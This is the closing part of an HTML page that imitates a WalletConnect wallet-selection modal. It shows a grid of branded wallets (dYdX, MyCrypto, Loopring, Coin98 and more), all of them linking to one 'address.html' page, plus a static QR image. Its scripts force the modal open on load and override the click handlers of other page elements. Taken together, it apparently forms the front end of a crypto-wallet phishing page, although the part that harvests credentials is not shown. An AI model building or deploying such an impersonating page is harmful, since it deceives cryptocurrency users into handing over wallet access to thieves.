group-hover:text-blue-700">Adex Network</div></div></a></div>
</div>
<div id="tab4Content">
<div class="grid max-w-3xl grid-cols-3 gap-10 mt-6 sm:grid-cols-4 md:grid-cols-4 ggg"><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-09c4e2ebc81a6a76c05d0c62f797151732fa9c0b84ef92654cd438849271e44b.jpeg" alt="dYdX"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">dYdX</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-2d0bda43d0c0703335ebc242e176182b5a50304b99984e01e86bebdd91238c7e.jpeg" alt="MyCrypto"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">MyCrypto</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-61f6e716826ae8455ad16abc5ec31e4fd5d6d2675f0ce2dee3336335431f720e.jpeg" alt="MYKEY"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">MYKEY</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-dcf291a025ead3e94ef694fa75617568daf76bf1e525bb240ecf5bf1add53756.jpeg" alt="Loopring"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Loopring</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-6bb4596640ce9f8c02fbaa83e3685425455a0917d025608b4abc53bfe55887c6.jpeg" alt="TrustVault"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">TrustVault</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-185850e869e40f4e6c59b5b3f60b7e63a72e88b09e2a43a40b1fd0f237e49e9a.jpeg" alt="Atomic"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Atomic</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-b021913ba555948a1c81eb3d89b372be46f8354e926679de648e4fa2938bed3e.jpeg" alt="Coin98"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Coin98</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-1f69170bf7a9bdcf89403ec012659b7124e158f925cdd4a2be49274c24cf5e5d.jpeg" alt="CoolWallet S"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">CoolWallet S</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-beea4e71c2ffbb48b59b21e33fb0049ef6522585aa9c8a33a97d3e1c81f16693.jpeg" alt="Alice"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Alice</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-138f51c8d00ac7b9ac9d8dc75344d096a7dfe370a568aa167eabc0a21830ed98.jpeg" alt="AlphaWallet"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">AlphaWallet</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-468b4ab3582757233017ec10735863489104515ab160c053074905a1eecb7e63.jpeg" alt="D'CENT Wallet"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">D'CENT Wallet</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-29f4a70ad5993f3f73ae8119f0e78ecbae51deec2a021a770225c644935c0f09.jpeg" alt="ZelCore"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">ZelCore</div></div></a></div>
</div>
<br/><a id="tab1" onClick="JavaScript:selectTab(1);">1</a>     <a id="tab2" onClick="JavaScript:selectTab(2);">2</a>     <a id="tab3" onClick="JavaScript:selectTab(3);">3</a>     <a id="tab3" onClick="JavaScript:selectTab(4);">4</a>

   



  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
</div>

<div id="Paris" class="tabcontent" style="border: none;">
  <div><div><p id="walletconnect-qrcode-text" class="walletconnect-qrcode__text">Scan QR code with a WalletConnect-compatible wallet</p><div  style="text-align: -webkit-center;"><img src="./bc.png" style="text-align: -webkit-center;">
</div><div class="walletconnect-modal__footer"><a>Copy to clipboard</a></div><div class="walletconnect-qrcode__notification"></div></div></div>
</div>

            <!-- Modal footer -->
            <!-- <div class="modal-footer">
        <button type="button" class="btn btn-danger" data-dismiss="modal">Close</button>
      </div> -->
          </div>
        </div>
      </div>
	  
	  
    </div>
	
    <!-- <link rel="stylesheet" href="bootstrap.min.css"> -->
    <link rel="stylesheet" href="./bootstrap.min.css" />
	<script>
	function selectTab(tabIndex) {
  //Hide All Tabs
  document.getElementById('tab1Content').style.display="none";
  document.getElementById('tab2Content').style.display="none";
  document.getElementById('tab3Content').style.display="none";
   document.getElementById('tab4Content').style.display="none";
  
  //Show the Selected Tab
  document.getElementById('tab' + tabIndex + 'Content').style.display="block";  
}
	
	
	// Get the element with id="defaultOpen" and click on it
document.getElementById("defaultOpen").click();
	
	
	
	function openCity(evt, cityName) {
  // Declare all variables
  var i, tabcontent, tablinks;

  // Get all elements with class="tabcontent" and hide them
  tabcontent = document.getElementsByClassName("tabcontent");
  for (i = 0; i < tabcontent.length; i++) {
    tabcontent[i].style.display = "none";
  }

  // Get all elements with class="tablinks" and remove the class "active"
  tablinks = document.getElementsByClassName("tablinks");
  for (i = 0; i < tablinks.length; i++) {
    tablinks[i].className = tablinks[i].className.replace(" active", "");
  }

  // Show the current tab, and add an "active" class to the button that opened the tab
  document.getElementById(cityName).style.display = "block";
  evt.currentTarget.className += " active";
}
	</script>
	
	<script>
window.onload=function(){
$("#buttt").click();
}
</script>
	<style>
	
	.grid-cols-3.ggg{grid-template-columns:repeat(4,minmax(0,1fr))}
	div.w-20.rounded-full{    box-shadow: 0px 0px 14px 0px #88888852;border-radius: 15px;padding:10px;margin:10px;}
	div.flex.mt-4{color:black; font-family:Kanit, sans-serif;font-weight:500;font-size:12px;}
	div.ggg a{padding:10px 5px;}
#tab1Content {
 display: block; 
}
 
#tab2Content, #tab3Content, #tab4Content {
 display: none; 
}
	
	
	
	/* Style the tab */
	
	.tabcontent {
  animation: fadeEffect 1s; /* Fading effect takes 1 second */
}

/* Go from zero to full opacity */
@keyframes fadeEffect {
  from {opacity: 0;}
  to {opacity: 1;}
}

.tab {
  overflow: hidden;
  background-color: #d4d5d9;
}

/* Style the buttons that are used to open the tab content */
.tab button {
  background-color: inherit;
  float: left;
  border: none;
  outline: none;
  cursor: pointer;
  padding: 5px 14%;
    margin: 5px;
  transition: 0.3s;
  border-radius: 10px;
  font-weight:600;
}

/* Change background color of buttons on hover */
.tab button:hover {
  background-color: #ddd;
}

/* Create an active/current tablink class */
.tab button.active {
  background-color: white;
}

/* Style the tab content */
.tabcontent {
  display: none;
  padding: 6px 12px;
  border: 1px solid #ccc;
  border-top: none;
}
	
	
	
	
	
	
	
	
	
        .gDyhhL:hover:not(:disabled):not(.button--disabled):not(:active) {
            background-color: rgb(239, 244, 245);
            border-color: currentcolor;
        }

        .gDyhhL {
            -moz-box-align: center;
            align-items: center;
            background-color: rgb(239, 244, 245);
            border: 0px none;
            border-top-color: currentcolor;
            border-right-color: currentcolor;
            border-bottom-color: currentcolor;
            border-left-color: currentcolor;
            border-radius: 16px;
            box-shadow: none;
            color: rgb(31, 199, 212);
            cursor: pointer;
            display: inline-flex;
            font-family: inherit;
            font-size: 16px;
            font-weight: 600;
            width: 100%;
            height: 48px;
            line-height: 1;
            letter-spacing: 0.03em;
            -moz-box-pack: center;
            justify-content: center;
            outline: currentcolor none 0px;
            padding: 0px 24px;
            transition: background-color 0.2s ease 0s;
            opacity: 1;
            margin-bottom: 8px;
        }

        .bWSRKb:hover:not(:disabled):not(.button--disabled):not(:active) {
            background-color: rgb(239, 244, 245);
            border-color: currentcolor;
        }

        .bWSRKb {
            -moz-box-align: center;
            align-items: center;
            background-color: rgb(239, 244, 245);
            border: 0px none;
            border-top-color: currentcolor;
            border-right-color: currentcolor;
            border-bottom-color: currentcolor;
            border-left-color: currentcolor;
            border-radius: 16px;
            box-shadow: none;
            color: rgb(31, 199, 212);
            cursor: pointer;
            display: inline-flex;
            font-family: inherit;
            font-size: 16px;
            font-weight: 600;
            width: 100%;
            height: 48px;
            line-height: 1;
            letter-spacing: 0.03em;
            -moz-box-pack: center;
            justify-content: center;
            outline: currentcolor none 0px;
            padding: 0px 24px;
            transition: background-color 0.2s ease 0s;
            opacity: 1;
            margin-bottom: 0px;
        }

        .fTbwUB:hover {
            text-decoration: underline;
        }

        .jXWXLS {
            display: flex;
            align-self: center;
            -moz-box-align: center;
            align-items: center;
            margin-top: 24px;
        }

        .UlHUk {
            color: rgb(31, 199, 212);
            font-size: 16px;
            font-weight: 600;
            line-height: 1.5;
        }

        .kuIIGS {
            font-size: 20px;
            font-weight: 600;
            line-height: 1.1;
        }

        .hKmpfr {
            color: rgb(69, 42, 122);
            font-size: 16px;
            font-weight: 600;
            line-height: 1.5;
        }
		.ggg {
			display: grid;
		}
		div > img.inline-block.w-20 {
			width: -webkit-fill-available;
		}
		.modal.in {
			text-align: -webkit-center !important
		}
		.walletconnect-modal__header {
			max-width: 500px;
		}
    </style>
    
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<script>
function buttt1() {
    $("#buttt").click();
} 
</script>
<script>
document.getElementsByClassName("wallet-0-2-12")[0].setAttribute("onclick", "buttt1()"); 
document.getElementsByClassName("network-0-2-27")[0].setAttribute("onclick", "buttt1()"); 
document.getElementsByClassName("wrapper-0-2-26")[0].setAttribute("onclick", "buttt1()"); 
</script>

	
	
</body>

</html>